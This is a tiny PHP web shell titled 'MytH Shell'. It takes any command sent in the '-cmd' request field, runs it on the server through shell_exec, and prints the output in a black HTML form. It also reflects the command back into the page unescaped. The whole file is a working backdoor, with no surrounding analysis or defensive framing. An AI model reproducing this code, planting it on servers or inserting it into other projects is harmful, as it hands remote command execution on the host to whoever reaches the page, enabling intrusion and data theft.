<? $cmd = $_REQUEST["-cmd"];?><html><head><title> MytH Shell</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64value="<?=$cmd?>" style="background #000000;color:#ffffff;"><hr><pre><? if($cmd !="") print Shell_Exec($cmd); ?></pre></form></body></html>
|